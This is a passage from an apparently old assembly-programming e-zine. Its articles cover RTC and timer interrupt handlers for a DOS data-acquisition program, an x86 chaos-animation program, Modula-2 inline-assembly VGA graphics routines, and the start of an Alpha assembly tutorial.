in al, 071 ; clear interrupt flags
test [Flags], Running ; are we running?
jz L1 ; if not, get out
test [Flags], FastMode ; Samplerate over 128 Sps?
jz >L2 ; if not, scram
or [Flags], TimeOut ; else set TimeOut flag
jmp L1
L2: mov ax, [IrqCount] ; medium to slow samplerates
dec ax ; are we at correct value?
jnz L0 ; ... if not, wait some more
or [Flags], TimeOut ; ... if so, set TimeOut flag,
mov ax, [MaxCount] ; ... reload time constant
register
jmp L0
---- End ------------------------------------------- NewIRQ8 --------
I like to do as little as possible in this kind of routines. In this
case I set a flag and rely on the abillities of the background program
to fork execution based on the state of that flag.
I hate the idea of having an INT routine that actually DOES things, but
which, for some obscure reason, cannot complete before the next INT
comes in. You'll be able to figure out what will happen in most cases.
If this routine sets a flag twice, I don't care too much. OK, I loose a
sample, but the program keeps running and it will still terminate when I
ask it to.
This routine:
- saves registers on the user-stack
- restores correct DS
- accesses the FLAGS register in memory
- consults these flags and acts upon them
- eventually reaches L1 and here an EOI is sent to the PIC's
- pops the stored registers from the userstack
- returns with an IRET.
The PIC needs an EOI to enable lower priority interrupts. And since
there are two PIC's in modern PC's, there also must be two EOI's.
The following routine will enable the new IRQ8 handler:
--- Begin ----------------------------------- EnableNewIRQ8 ---------
EnableNewIRQ8: ; program the RTC chip to 1 kSps
push ax ; and enable the 8259 PIC, channel 8
mov al, 0C
out 070, al
in al, 071 ; check register C first
mov ah, 00100110xB
call SetPIRate ; set PI rate to 1 kSps
mov al, 0B
out 070, al
mov al, 01000010xB ; enable the RTC interrupt pin
out 071, al ; and store it in RTC register B
call EnableIRQ8 ; enable the 8259 PIController
pop ax
ret
---- End ------------------------------------ EnableNewIRQ8 ---------
And before going back to the OS of your choice, make sure there will be
no IRQ8's anymore coming this way:
--- Begin ----------------------------------- ResetNewIRQ8 ----------
ResetNewIRQ8: ; restore default values in RTC
push ax ; and disable 8259 PIC, channel 8
mov al, 0A
out 070, al ; select register A
mov al, 00100110xB
out 071, al ; and set it back to PC default
mov al, 0B
out 070, al
mov al, 00000010xB ; disable interruptions from RTC chip
out 071, al ; via register B
call DisableIRQ8 ; handle the PIC
pop ax
ret
---- End ------------------------------------ ResetNewIRQ8 ----------
In the big program these code fragments are from, I use two timer
interrupts:
- the RTC timer is used for trigger-timing. When the RTC has set the
right flag, the main program will sample the ADC and store the
result in a buffer for later processing.
- the internal PC klok which generates the 55 ms timing signals is
used to set another flag. When this is set, the (DMM style) display
is updated. The digital readout is updated about 3 times per second
and the bargraph display is updated 18 times per second.
Therefore I also need a new IRQ0 handler:
---------------------------------------------------- NewIRQ0 --------
L0: pop ds ; restore register
jmp [cs:OldIRQ0] ; and update DOS clock
NewIRQ0: push ds ; new timer routine (18,2 Hz)
cs mov ds, [DataSeg] ; restore DS
test [Flags], Running
jz L0 ; if not running, eject!
inc [Counter] ; else increment counter,
or [Flags], RefrshBar ; indicate "bargraph refresh"
test [Counter], 07 ; twice per second,
IF Z or [Flags], RefrshDig ; indicate "digits update"
jmp L0 ; and get out
---------------------------------------------------- NewIRQ0 --------
This new routine does the following:
- check if the DMM is running,
- if not, it makes no sense to set any flags,
- if running, set the "update bargraph display" flag,
- if running, check if it is time to update the digital readout,
- restore DS register,
- branch to previous IRQ0 handler.
In the initialisation routine, common to all my programs, I make sure
the right interrupt vectors are stolen:
--- Begin ------------------------------------------ Init -----------
init: call SetVars ; init most import variables
call PowDown ; make sure ADC is OFF
call ClkLo ; prepare ADC for power-up
call ChkTime ; measure minimum sample time
call MaxSps ; determine maximum sample speed
mov ah, 0F
int 010 ; determine existing video mode
mov [VidMode], al ; store it
mov ax, 012
int 010 ; set 640 x 480 graphics mode
push es
mov ax, 0351C ; get old timervector
int 021
mov w [OldIRQ0], bx
mov w [OldIRQ0+2], es
mov dx, offset NewIRQ0
mov ax, 0251C
int 021 ; install new TIMER routine
mov ax, 03570
int 021
mov w [OldClock], bx
mov w [OldClock+2], es
mov dx, offset NewIRQ8
mov ax, 02570
int 021 ; install NewIRQ8 routine
call EnableNewIRQ8 ; and get it to work
pop es
mov ax, 0
int 033 ; init mouse
ShowMouse ; this is a macro....
call FillScreen
or [Flags], RfrshBar + RefrPara + Upd8Digs
call ShowDig
call BrScale
call Update
ret
---- End ------------------------------------------- Init -----------
Not much to explain about this INIT routine I guess.
So, on to the EXIT part of the software. Forget this, and the computer
will hang on random times afterwards....
--- Begin ------------------------------------------ Exit -----------
exit: call PowDown
call ResetNewIRQ8
push ds
lds dx, [OldIRQ0]
mov ax, 0251C
int 021 ; restore timer vector
pop ds
push ds
lds dx, [OldClock]
mov ax, 02570
int 021 ; restore realtime clock vector
pop ds
mov ah, 0
mov al, [VidMode]
int 010 ; back to previous screenmode
mov ax, 0
int 033 ; reset mouse and -driver
mov ax, 04C00
int 021 ; and exit to DOS
---- End ------------------------------------------- Exit -----------
That's all you need to know to get started. The RTC chip has some nice
other possibillities. It can be programmed to interrupt each second. Or
any other number of seconds. It is a truly versatile chip with many
timing functions directly available to systems level programmers.
It might be a good idea to seacrh the web for a datasheet. A good
starting point will be www.dalsemi.com where PDF files will be available
for all DS 1287 style chips. Or else from ftp.dalsemi.com. The latest
versions of this chip that I know of is the DS 17887. This has a Y2K
compliant clock and over 8K of NV (=Non Volatile) RAM.
In the USA Dallas have an Automatic Datasheet FaxBack number:
972 - 371 4441
Have fun exploiting the RTC chip, but be prepared to hit the reset
button now and then. Also, make a backup of the CMOS battery-backup RAM
onto a floppy disk! You'll have corrupted or erased these data before
you know it and it's always a bit of a shock if the system cannot even
find the C: drive anymore....
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Chaos
Animation
by Laura
Fairhead
To assemble this program you are going to require most of the library
routines I have so far presented here. You can consider this an example
in just how easy it is to write software in assembler if you continue
to build and refine a library system. The program probably took me about
half an hour of work and most of that was making myself satisfied with
the niceness of the code:-
;issue #5
INCLUDE NUCONV.ASM
;issue #6
INCLUDE SCANU.ASM
;issue #7
;scalst list scanner
INCLUDE SCAWS.ASM
;random number generator
INCLUDE RAND.ASM
;ASM building blocks
INCLUDE PSTR.ASM
INCLUDE PSTRCR.ASM
INCLUDE PSTRCX.ASM
INCLUDE OUTCR.ASM
INCLUDE STRLEN.ASM
INCLUDE PUTCH.ASM
Overview
~~~~~~~~
This is a simple but endearing graphical animation minature that
is based on the iterative function:-
x' = x*x + y + a
y' = b - x
Where a,b are constants, x,y are old coordinates and x',y' are the
new ones. All values are taken to be in [0,1). That is the operations
are all performed modulo 1.
If you haven't covered this in mathematics yet it is quite simple,
your function mod1 would be:-
mod1(x) = x - int(x)
This can all be done nicely within the bounds of 32-bit values,
simply view the binary point as being just before the MSbit.
We only really have 4 values to keep since x',y' are the next x,y.
kaa EQU kaera+1
kab EQU kaa+4
kax EQU kab+4
kay EQU kax+4
The EQU's at the program end are defining offsets for uninitialised
data that lies in the primary code segment. Here we have kaa<->a, kab<->b,
kax<->x, kay<->y
;EAX=x
MOV EAX,DWORD PTR DS:[kax]
;EBX=b
MOV EBX,DWORD PTR DS:[kab]
;EBX=b-x =y'
SUB EBX,EAX
;ECX=y' for later use
MOV ECX,EBX
;EBX=y, y'->y (didn't I say XCHG is useful!)
XCHG EBX,DWORD PTR DS:[kay]
;EBX=y+a
ADD EBX,DWORD PTR DS:[kaa]
;EDX:EAX=x*x
;high dword is the first 32 b.p's....
MUL EAX
;EBX=x*x+y+a =x' (how much of the pattern is due to loss of accuracy here?)
ADD EBX,EDX
;x<-x'
MOV DWORD PTR DS:[kax],EBX
Reasonably efficient, and we come out with the x,y coordinate pair
also in EBX,ECX.
To jazz things up a little, instead of the basic idea:-
(i) set some random x,y,a,b
(ii) do our function on the x,y,a,b
(iii) plot point on the screen representing x,y
(iv) go back to (ii)
We implement a "trail". This is basically where we keep a store of
the last so many points drawn (remember that classic WORM game??).
Then one end is added to and the other is deleted from. Points are all
plotted with XOR, especially since doing a second XOR will erase a
plotted point (so there is no erase routine).
Furthermore for every point, 4-reflections of the point are plotted
to the screen. This gives you symmetry for free.
The plot routine
~~~~~~~~~~~~~~~~
I'm going to first explain the plot routine before going into the
main code body. I had some fun writing it, but it also illustrates some
important points.
We are using mode 011h. This is 640x480x2, ( 0280hx01E0h )
With mode 011h you have of course only the one plane. You've got
bytes from +00h to +04Fh on each row representing 8-bit pixel groups.
So given an x coordinate you need to take the 2 parts:-
offset =x SHR 3
bit =x AND 3
The y coordinate is just the one part, the offset:-
offset =y *050h (row=050h bytes)
Now of course it is plain to see that the offset is simply the result
of multiplication by 5 and then shift left 4. (unless you work always in
decimal, ala 050h=5*010h)
Oh, I LOVE the x86:-
LEA SI,[EDX*4+EDX]
This puts DX*5 straight into SI. Thats about 5 operations all in one
go:)
So then SI is shifted 4 left and the resultant offset y*050h is the y
component of the offset on screen of the pixel we want to plot.
The routine keeps the x/y components apart because we want to plot
(x,y) (-x,y) (-x,-y) (x,-y). And as soon as they are put together for
one they need to be disassembled/reconstructed for the next.
The x component, which is always in BX, is obviously created with
a shift right 3, however we first have to rescue the least significant
3 bits. They give the bit in the byte.
MOV CL,BL
MOV AX,0180h
ROR AL,CL;ROL AH,CL
Here I am getting AL with the bit set that corresponds to the the pixel
on screen. AH is being set up the opposite way around. Think of the screen
as four quadrants:-
|
x+ | x-
y+ |
|
-----------+-------------
|
|
y- |
|
|
If our point starts in the x+y+ quadrant, we have the values to
draw that:-
( SHR BX,3 )
XOR [SI+BX],AL
Now to reflect the point x-wise, so it goes to x-y+, you only need
to get the x offset = 04Fh-x. Well x86 lets you do powerful things,
we don't need to mess; just negate BX to get the -x and add the 04Fh
in as a displacement. Of course the bit offset gets negated as well,
which is exactly why we have the two opposite masks in AL/AH:-
NEG BX;XOR [SI+BX+04Fh],AH
Next y is reflected, so we go to -x-y. This is the same thing
again, only the y coordinate will only affect the offset:-
NEG SI;XOR [SI+BX+04Fh+01DFh*050h],AH
And finally to +x-y:
NEG BX;XOR [SI+BX+01DFh*050h],AL
Notes
~~~~~
During the program run you can press any key to set different values
for the chaos function. Press ESC to abort. On abortion a message will
give you 2 hex d-words, these are the random number seed that generated
the last pattern you were watching. To see it again simply record the
values and invoke the program with the values on the command line:-
(ESC abort)
random seed=01234567 FEDCBA98 (program output)
KAOS 01234567 FEDCBA98 (invoke program with seed as parameter)
(chaos pattern displayed is the same as the one broken out of)
The code is left undelayed and as such it may run too fast on a fast
machine. The optimum speed is for it to be only slighty over-fast. If
you want to achieve this you should add some sort of delay loop in. Alt-
ernatively just get out your old 386 and give it some work to do.
Code is, as usual, is MASM format. Assemble to a COM file.
========START OF CODE======================================================
OPTION SCOPED
OPTION SEGMENT:USE16
.486
stksiz EQU 0400h ;stack size
kadatx EQU 0C00h ;#points length of trail
cseg SEGMENT BYTE
ASSUME NOTHING
ORG 0100h
kode PROC NEAR
;initialise, allocate memory and stack
CLD
MOV AH,04Ah
MOV BX,OFFSET endof+0Fh
SHR BX,4
INT 021h
JC errmem
MOV SP,OFFSET stk+stksiz
;zero-terminate command line to facilitate
;parsing
MOV SI,080h
LODSB
CBW
XCHG BX,AX
MOV [BX+SI],BH
;any parameters given?
CALL NEAR PTR scaws
CMP AL,0
JZ SHORT ko0
;yes, so read 2 dwords as random seed
MOV DI,OFFSET rndn
MOV AL,010h
CALL NEAR PTR scanur
CALL NEAR PTR scanu
JNA erripa
STOSD
CALL NEAR PTR scaws
CALL NEAR PTR scanu
JNA erripa
STOSD
JMP SHORT ko1
;no, so set random seed from system time
ko0: CALL NEAR PTR rndseed
ko1:
lop2:
;set mode 011h, fade grey background
MOV AX,011h
INT 010h
MOV EAX,040404h
MOV BL,0
CALL NEAR PTR spal
;save random seed so that kaos params can be restored
;by user
MOV SI,OFFSET rndn
MOV DI,OFFSET seed
MOVSD;MOVSD
;set random params for function
MOV DI,OFFSET kaa
MOV CX,4
lop1:
CALL NEAR PTR rndgen32
STOSD
LOOP lop1
;initialise for plot trail
; [kaera]=0 on the first pass of the store
; [kaera]=-1 thereafter
; [kaoff]=offset of store pointer
MOV BYTE PTR DS:[kaera],0
MOV WORD PTR DS:[kaoff],OFFSET kadat
lop0:
;iterate x,y
; x'=x*x+y+a
; y'=b-x
MOV EAX,DWORD PTR DS:[kax]
MOV EBX,DWORD PTR DS:[kab]
SUB EBX,EAX
MOV ECX,EBX
XCHG EBX,DWORD PTR DS:[kay]
ADD EBX,DWORD PTR DS:[kaa]
MUL EAX
ADD EBX,EDX
MOV DWORD PTR DS:[kax],EBX
;x,y scale to screen bounds
; gets the x,y [0,1) values into screen coordinate pair (BX,DX)
SHR EBX,12
LEA EBX,[EBX*4+EBX]
SHR EBX,13
MOV EDX,ECX
SHR ECX,4
SUB EDX,ECX
SHR EDX,23
;do point
; [kaera] is -1 on and after the store had become full for the first
; time
MOV DI,WORD PTR DS:[kaoff]
TEST BYTE PTR DS:[kaera],-1
JZ SHORT ko3
;unplot trail end point
PUSH BX
PUSH DX
MOV BX,[DI]
MOV DX,[DI+2]
CALL NEAR PTR plo4
POP DX
POP BX
;current position is saved in store
ko3: MOV AX,BX
STOSW
MOV AX,DX
STOSW
;store ptr incremented wrapping at the end
CMP DI,OFFSET kadat+kadatx*4
JNZ SHORT ko4
MOV DI,OFFSET kadat
OR BYTE PTR DS:[kaera],-1
ko4: MOV WORD PTR DS:[kaoff],DI
;current position is plotted
CALL NEAR PTR plo4
;user
; ESC aborts, any key sets a new function going
MOV AH,0Bh
INT 021h
CMP AL,0
JZ lop0
MOV AH,7
INT 021h
CMP AL,01Bh
JNZ lop2
;display random seed value and terminate
MOV SI,OFFSET t0
CALL NEAR PTR pstr
MOV EAX,02083010h
CALL NEAR PTR nuconvs
MOV SI,OFFSET seed
;those instructions at the program start are never going to be
;executed again so use them as a temp workspace instead of kadat
;which could possibly be dangerous if somebody EQU's kadatx to
;some low value
MOV DI,0100h
PUSH DI
LODSD
CALL NEAR PTR nuconv
MOV AL,020h
STOSB
LODSD
CALL NEAR PTR nuconv
MOV AL,0
STOSB
POP SI
CALL NEAR PTR pstrcr
;screen mode is not put back to 02h you may wish to add
;a MOV AX,2;INT 010h here however I left it out because I
;see way too much of that mode
;program termination
terminat0:
MOV AL,0
terminat:
MOV AH,04Ch
INT 021h
;error aborts
erripa:
MOV SI,OFFSET terripa
MOV AL,2
JMP SHORT err
errmem:
MOV SI,OFFSET terrmem
MOV AL,1
err:
PUSH SI
MOV SI,OFFSET terr
CALL NEAR PTR pstr
POP SI
CALL NEAR PTR pstrcr
JMP terminat
terr: DB "ERROR: ",0
terrmem:
DB "memory allocation failure",0
terripa:
DB "invalid parameter format",0
;program text (in it's entirely)
t0: DB "random seed=",0
kode ENDP
;plo4- 4-way plot routine for mode 011h
;
; plots 4 reflections of a single point on the mode 011h
; screen these are (x,y) (-x,y) (-x,-y) (x,-y)
;
; plots using XOR
;
;entry: BX,DX=x,y coordinates
;
;exit: SI,CL,AX,BX destroyed
plo4 PROC NEAR
PUSH DS
;screen segment 0A000h
; for further comment please refer above
PUSH 0A000h
POP DS
LEA SI,[EDX*4+EDX]
SHL SI,4
MOV CL,BL
MOV AX,0180h
ROR AL,CL
ROL AH,CL
SHR BX,3
XOR [SI+BX],AL
NEG BX
XOR [SI+BX+04Fh],AH
NEG SI
XOR [SI+BX+04Fh+01DFh*050h],AH
NEG BX
XOR [SI+BX+01DFh*050h],AL
POP DS
RET
plo4 ENDP
;if you don't like my fade grey background you can delete this and
;the line that invokes it. However this is also the next library
;routine, so do cut/paste it into a file it will be used in future
;articles.
;spal- set VGA DAC register via hardware
;entry: EAX=XXGGBBRR (hex of course)
;
; RR=red component
; BB=blue component
; GG=green component
;
; don't forget that these values are <=03Fh
;
; BL=DAC register to set
;
;
;exit: (all registers are preserved)
spal PROC NEAR
;the code here is straightforward so I shall add no comment apart
;from a small moan:( I have used direct hardware access instead
;of the BIOS calls to affect the palette since square one, I'm
;not unreasonable in my desire to program the hard-metal of the machine,
;however the quality of the BIOS graphics routines is absolutely
;despicable. If you've ever tried using them you will know what I'm
;talking about.
;
PUSH EAX
PUSH DX
MOV DX,03C8h
CLI
XCHG BX,AX
OUT DX,AL
INC DX
XCHG BX,AX
OUT DX,AL
SHR EAX,8
OUT DX,AL
SHR EAX,8
OUT DX,AL
STI
POP DX
POP EAX
RET
spal ENDP
;library routines
INCLUDE RAND.ASM
INCLUDE SCAWS.ASM
INCLUDE SCANU.ASM
INCLUDE NUCONV.ASM
INCLUDE PSTR.ASM
INCLUDE PSTRCR.ASM
INCLUDE PSTRCX.ASM
INCLUDE OUTCR.ASM
INCLUDE STRLEN.ASM
INCLUDE PUTCH.ASM
;data
kaoff EQU $ ;(w) offset of trail store pointer
(absolute)
kaera EQU kaoff+2 ;(b) flag indicating 1st trail pass
kaa EQU kaera+1 ;(dw) a
kab EQU kaa+4 ;(dw) b kaos function parameters
kax EQU kab+4 ;(dw) x
kay EQU kax+4 ;(dw) y
kadat EQU kay+4 ;(*) store space for trail data
seed EQU kadat+kadatx*4 ;(qw) copy of initial random number seed
stk EQU seed+8 ;(*) stack space
endof EQU stk+stksiz ;[endofprogram]
cseg ENDS
END FAR PTR kode
========END OF CODE========================================================
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Inline Assembler With
Modula
by Jan Verhoeven
I don't want to start a compiler-war in the assembler programmer's journal,
but I do want to show some nice in-line assembly routines for FST Modula-2.
FST (or Fitted Software Tools) was a shareware Modula-2 compile made by
Roger
Carvalho. He eventualy gave up the concept of shareware and made his final
version freeware. If you look carefully you can find this package in many
software repositories like Simtel. Also the FreeDOS website used to harbor
this final version.
For this Modula-2 compiler I used my VGA routines (see previous issues) and
some in-line assembly to give this compiler a way to do graphics modes.
I uploaded the full sources to SimTel some months (or years?) ago, so if you
would like to have a detailed look at it, go there and look for it.
Modula-2 is despised by many, but it is the most structured language ever
made. And that's also probably the reason why most coders refuse to use it.
You must follow the compiler, whatever you do. A high price, but the result
is
that Modula-2 programs seldomly crash. They can bail-out in the middle of
the
program, but they will not hang due to a pointer or indexing error.
Anyway, here's my addition to this marvelous language:
---------------------------------------------------------------------------
IMPLEMENTATION MODULE VgaLib;
PROCEDURE SHL (x, y : CARDINAL) : CARDINAL; (* Shift left x, y
bits. *)
VAR result : CARDINAL;
BEGIN
ASM
MOV AX, x
MOV CX, y
AND CX, 15 (* Mask off lower nybble *)
JCXZ ok (* Get out if no shift. *)
SHL AX, CL
ok: MOV result, AX (* Store result. *)
END;
RETURN result;
END SHL;
---------------------------------------------------------------------------
The only "drawback" is that the in-line code must be 8088 style. So you
won't
be eable to use MMX instructions, but almost no-one ever needs those.
FST Modula-2 offers direct access to (values of) variables. Neat. Makes the
in-line feature very convenient to use.
---------------------------------------------------------------------------
PROCEDURE SetColour (Colour : CHAR); (* Define colour to work with.
*)
BEGIN
ASM
MOV DX, 03C4H (* VGA controller port *)
MOV AH, Colour
MOV AL, 2
OUT DX, AX
END;
END SetColour;
---------------------------------------------------------------------------
Compare the following routine with the one I entered for the VGA-12h code in
A86 assembly language format. There's some Modula-2 overhead, but the actual
plotting is done in ASM, for speed-reasons.
---------------------------------------------------------------------------
PROCEDURE Plot (VAR InWin : WinData); (* Plot point on CurX, CurY. *)
VAR x, y : CARDINAL;
BEGIN
x := InWin.CurX + InWin.TopX;
y := InWin.CurY + InWin.TopY;
ASM
MOV AX, 0A000H
MOV ES, AX (* Set up segment register *)
MOV CX, x
AND CX, 7 (* Which bit to plot? *)
MOV AH, 80H
SHR AH, CL (* Compose plotting mask *)
MOV AL, 8
MOV DX, 03CEH
OUT DX, AX (* Set plottingmask *)
MOV AX, y (* Calculate offset in Video RAM *)
MOV BX, AX
ADD AX, AX
ADD AX, AX
ADD AX, BX (* AX := 5 * Y *)
MOV CL, 4
SHL AX, CL (* AX := 16 * 5 * Y *)
MOV BX, x
SHR BX, 1
SHR BX, 1
SHR BX, 1
ADD BX, AX (* plus X / 8 *)
MOV AL, ES:[BX]
MOV AL, 0FFH
MOV ES:[BX], AL (* and plot it *)
END;
END Plot;
PROCEDURE DrawH (VAR InWin : WinData; Flag : BOOLEAN);
(* Draw a horizontal line from CurX, CurY for DeltaX pixels. *)
VAR Index, Stop, x, dx, y, Kval : CARDINAL;
Emask, Lmask, Val : CHAR;
BEGIN
IF Flag THEN (* Flag = TRUE => Plot, else UnPlot *)
Val := 0FFX;
ELSE
Val := 0X;
END;
IF InWin.DeltaX < 18 THEN
FOR Index := 0 TO InWin.DeltaX DO (* For short lines *)
Plot (InWin);
INC (InWin.CurX);
END;
ELSE
x := InWin.TopX + InWin.CurX; (* For long lines *)
y := InWin.TopY + InWin.CurY;
dx := InWin.DeltaX;
ASM
MOV AX, 0A000H
MOV ES, AX (* Set up segment register *)
MOV CX, x
AND CX, 7
MOV BX, 8
SUB BX, CX
MOV AL, 0FFH
SHR AL, CL
MOV Emask, AL (* compose plotting mask *)
MOV CX, dx
SUB CX, BX
MOV AX, CX
AND AX, 7
PUSH AX (* Save L-val *)
SUB CX, AX
SHR CX, 1
SHR CX, 1
SHR CX, 1
MOV Kval, CX
MOV AL, 0
POP CX (* retrieve L-val *)
JCXZ L0
MOV AL, 080H
L0: DEC CX
SAR AL, CL
MOV Lmask, AL
MOV AX, y (* Calculate offset in Video RAM *)
MOV BX, AX
ADD AX, AX
ADD AX, AX
ADD AX, BX (* AX := 5 * Y *)
MOV CL, 4
SHL AX, CL (* AX := 16 * 5 * Y *)
MOV BX, x
SHR BX, 1
SHR BX, 1
SHR BX, 1
ADD BX, AX (* plus X / 8 *)
MOV AH, Emask
MOV DX, 03CEH
MOV AL, 8
OUT DX, AX (* Set plotting mask *)
MOV AL, Val
MOV AH, ES:[BX]
MOV ES:[BX], AL (* Do the plotting ... *)
INC BX
MOV CX, Kval
JCXZ L2
MOV AX, 0FF08H
OUT DX, AX
MOV AH, Val
L1: MOV AL, ES:[BX]
MOV ES:[BX], AH
INC BX
LOOP L1
L2: MOV AH, Lmask
MOV AL, 8
OUT DX, AX
MOV AL, ES:[BX]
MOV AL, Val
MOV ES:[BX], AL
END;
INC (InWin.CurX, dx);
END;
END DrawH;
PROCEDURE PlotChar (VAR InWin : WinData; Letter : CHAR);
(* Plot character on InWin.(CurX,CurY). *)
VAR xpos, ypos, MapOfs, VGApos, VGAseg, Pmask : CARDINAL;
Cval : CHAR;
BEGIN
IF Letter = 0AX THEN
INC (InWin.CurY, 16); (* Process LF *)
RETURN;
END;
IF Letter = 0DX THEN
InWin.CurX := InWin.Indent; (* Process CR *)
RETURN;
END;
IF InWin.CurX >= InWin.Width - ChrWid THEN
InWin.CurX := InWin.Indent;
INC (InWin.CurY, 16);
END;
xpos := InWin.CurX + InWin.TopX;
ypos := InWin.CurY + InWin.TopY;
VGApos := 80 * ypos + SHR (xpos, 3);
VGAseg := 0A000H;
MapOfs := ORD (Letter) * 16;
ASM
PUSH ES (* save ES *)
MOV CX, xpos
AND CX, 7
MOV Cval, CL (* nr of bits "off center" *)
MOV BX, 0FF00H
SHR BX, CL
MOV Pmask, BX (* mask to use for left and right halves *)
MOV AX, BX
MOV AL, 8
MOV DX, 03CEH
OUT DX, AX (* set plotting mask for left part *)
MOV CX, 16
MOV BX, VGApos
LES SI, BitMap (* here are the pixels that make the tokens *)
ADD SI, MapOfs
L0: PUSH CX
LES AX, BitMap (* load ES, AX is just scrap *)
MOV AH, ES:[SI] (* load pattern *)
MOV CL, Cval
SHR AX, CL (* compose left half *)
MOV ES, VGAseg
MOV AL, ES:[BX]
MOV ES:[BX], AH (* and "print" it *)
ADD BX, 80 (* point to next row *)
INC SI (* and next pixel pattern *)
POP CX
LOOP L0 (* repeat until done *)
MOV AX, Pmask
CMP AL, 0 (* if Cval = 0 => perfect allignment *)
JE ex (* skip second half *)
XCHG AH, AL (* else repeat the story once more *)
MOV AL, 8
OUT DX, AX (* set up mask for right half *)
MOV CX, 16
SUB BX, 1279 (* 16 x 80 - 1 *)
SUB SI, CX
L1: PUSH CX
LES AX, BitMap
MOV AH, ES:[SI]
MOV AL, 0
MOV CL, Cval
SHR AX, CL
MOV ES, VGAseg
MOV AH, ES:[BX]
MOV ES:[BX], AL
ADD BX, 80
INC SI
POP CX
LOOP L1
ex: POP ES
END;
INC (InWin.CurX, ChrWid); (* point to next printing position *)
END PlotChar;
---------------------------------------------------------------------------
And here is the promised solution for the "make a box-drawing routine"
problem
of the previous issue. OK, the solution is in Modula-2, but since this is
such
a clear to understand language it will be no big deal to port this code to
assembly language format.
---------------------------------------------------------------------------
PROCEDURE MakeBox (InWin : WinData);
(* Make a box on screen starting at (TopX, TopY). *)
BEGIN
InWin.CurX := 0;
InWin.CurY := 0; (* Make sure pointers are
correct *)
InWin.DeltaX := InWin.Width - 1;
InWin.DeltaY := InWin.Height - 1; (* setup parameters for drawing
lines *)
SetColour (InWin.BoxCol);
DrawH (InWin, TRUE); (* draw horizontal line *)
DrawV (InWin); (* draw vertical line *)
InWin.CurX := 0;
InWin.CurY := 1; (* adjust coordinates *)
DrawV (InWin); (* draw last vertical line *)
DEC (InWin.CurY);
INC (InWin.CurX); (* adjust coordinates once more
*)
DrawH (InWin, TRUE); (* draw final line *)
END MakeBox;
END VgaLib.
---------------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Assembly on the Alpha
Platform
by Rudolf Seemann
ASSEMBLING ON ALPHA PART I
--------------------------
In this first article I will discover how to use functions written in alpha
assembler in a program written in C. The example I give is a rather simple
one. There are many things to know about alpha. This text shows that it is
quite simple to use assembler on alpha.
Introduction
------------
The heart of the alpha architecture is a 64-bit RISC processor with 32
integer
($0 to $31) and 32 floating point registers ($f0 to $f31). Its operation
codes
can be classified by the number of its operands:
class opcode
operate opcode Ra,Rb,Rc # Ra operation Rb -> Rc
opcode Ra,number,Rc # Ra operation number (0-255) -> Rc
memory opcode Ra,Disp(Rb) # load/store contents saved in memory
address
# Rb + offset Disp in register Ra
branch opcode Ra,label # branch if Ra = true to label
PAL opcode number # opcodes for the operating system
The Usage Convention of register is listed in the following table. Saved
Registers are such whose contents will not be lost if a function is called.
The function will save such registers if it uses them.
int reg Usage Convention Saved
---------------------------------------------
$0 Integer function result No
$1-$8 Conventional scratch regs No
$9-$14 General uses Yes
$15 or $fp Frame pointer Yes
$16-$21 Integer arguments by value No
$22-$25 Conventional scratch regs No
$26 Return address register Yes
$27 Procedure value (pointer) No
$28 or $at reserved for system No
$29 or $gp Global pointer No
$30 or $sp Stack pointer Yes
$31 Zero (not modifiable) n/a
float reg Usage Convention Saved
--------------------------------------------------
$f0 floating point function result No
$f1 Imaginary part function result No
$f2-$f9 General uses Yes
$f10-$f15 Conventional scratch regs No
$f16-$f21 Floating point args by value No
$f22-$f30 Conventional scratch regs No
$f31 Zero (not modifiable) n/a
Data Types are specified by suffixes (like q for quadword, l for longword).
Most integer operations only know these two suffixes. Floating point
operations
know both: s and t.
Integer Data types:
Type Bits signed range unsigned range
---------------------------------------------------------------------
Byte 8 -128 to 127 0 to 255
Word 16 -32768 to 32767 0 to 65535
Longword 32 -2147483648 to 0 to 4294967295
2147483647
Quadword 64 -9228372036854775808 0 to
9228372036854775807 18446744073709551615
Floating Point Data Types:
Type Magnitude Precision
----------------------------------------------------------------
S-floating 1.175 x 10^-38 to 3.403 x 10^38 6 decimal digits
T-floating 2.225 x 10^-308 to 1.798 x 10^308 15 decimal digits
If you want to use 64-bit numbers in the c-programming language (gcc), use
(long) or (long int). (int) is 32 bits long.
The following example was tested on an SX164 with SuSE Alpha Linux 6.3
(Kernel
2.2.13).
The Example
-----------
My c-program calls the assembler function div which divides the first
argument
given to it by the second one. The arguments will be put in the integer
registers $16 and $17 by convention. So all we have to do is to divide
register
$16 by $17. The alpha does not know any division for integer. There is a
pseudo-
opcode for integer-division but I will show how to convert an integer to a
floating point number, do the division in the floating point registers and
convert it back to integer. Finally the result will be put by convention in
register $0 where the c-program expects it to be.
Compiling the source codes
--------------------------
gcc -c div.s
gcc -o div divide.c div.o
Source of the C-program
-----------------------
/* divide.c */
#include <stdio.h>
int main()
{
long int a,b,c; /* long int is 64 bits long */
a=1111; /* a random number */
b=14; /* second random number */
c=div(a,b); /* div is a function written in assembler code */
/* div returns the value of a / b */
printf("c is %d\n",c);
exit(0);
}
-------------------------------------------------- cut here
Source of the Assembler-Program: div.s
-------------------------------------------------- cut here
.title div divides two arguments and returns the result
.data # Data section
temp1: .quad 0 # temporary variable
temp2: .quad 0 # temporary variable
temp3: .quad 0 # temporary variable
REGS = 1 # How many registers have to be saved
STACK = REGS # this registers will be put on the stack
FRAME = ((STACK*8+8)/16)*16 # Stack size
.text # text section
.align 4
.set noreorder # disallow rearrangements
.globl div # these 3 lines mark the
.ent div # mandatory function
div: # entry
ldgp $gp,0($27) # load the global pointer
lda $sp,-FRAME($sp) # load the stack pointer
stq $26,0($sp) # save our own exit address
.frame $sp,FRAME,$26,0 # describe the stack frame
.prologue 1
stq $16,temp1 # save register $16 (first argument)
stq $17,temp2 # save register $17 (second argument)
ldt $f2,temp1 # load 1st argument in floating point register
ldt $f3,temp2 # load 2nd argument in floating point register
cvtqt $f2,$f2 # convert integer to floating point
cvtqt $f3,$f3 # convert integer to floating point
divt $f2,$f3,$f4 # $f4 <-- $f2 / $f3
cvttq $f4,$f4 # convert floating point to integer
stt $f4,temp3 # store integer
ldq $0,temp3 # load integer in integer register
done: ldq $26,0($sp) # restore exit address
lda $sp,FRAME($sp) # Restore stack level
